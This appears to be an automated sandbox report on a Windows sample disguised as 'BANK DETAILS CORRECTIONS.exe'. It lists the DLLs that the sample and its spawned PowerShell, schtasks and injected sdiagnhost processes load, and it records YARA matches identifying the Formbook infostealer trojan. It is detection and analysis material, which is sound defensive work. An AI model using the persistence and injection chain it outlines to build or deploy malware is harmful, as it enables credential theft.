                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000000.1248838947.00000000009EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehBWP.exe@ vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1303137425.000000000755E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehBWP.exe@ vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1294018574.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdiagnhost.exej% vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.0000000001A1D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exeBinary or memory string: OriginalFilenamehBWP.exe@ vs BANK DETAILS CORRECTIONS.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: rasadhlp.dll
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: fcLfLlfpmjf.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, ivtNue3aMakjbVsfus.csCryptographic APIs: 'CreateDecryptor'
